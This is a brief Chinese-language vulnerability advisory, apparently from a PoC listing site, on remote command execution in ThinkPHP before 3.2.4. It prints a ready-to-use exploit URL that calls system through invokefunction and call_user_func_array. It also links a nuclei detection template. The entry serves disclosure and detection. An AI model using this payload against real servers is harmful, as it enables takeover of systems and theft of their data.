# N/A
## 漏洞概述
ThinkPHP版本低于3.2.4,包括Open Source BMS v1.1.1在内的多个产品中存在远程代码执行漏洞。攻击者可以通过特定URL请求执行任意系统命令。
## 影响版本
- ThinkPHP 3.2.4 之前版本
## 漏洞细节
攻击路径通过构造特定的URL请求来触发漏洞,格式如下:
```
public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=
```
在上述URL的末尾添加系统命令即可执行该命令。
## 影响
该漏洞允许攻击者执行任意系统命令,可能造成服务器被完全控制,包括但不限于数据泄露、服务中断等严重后果。
是否为 Web 类漏洞: 是
判断理由:
| # | POC 描述 | 源链接 | 神龙链接 |
|---|---|---|---|
| 1 | ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via the s parameter in index.php through the invokefunction functionality. | https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9082.yaml | POC详情 |
暂无评论